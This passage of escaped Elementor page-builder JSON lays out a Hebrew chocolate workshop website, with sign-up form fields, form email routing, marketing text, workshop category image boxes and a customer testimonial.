Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\"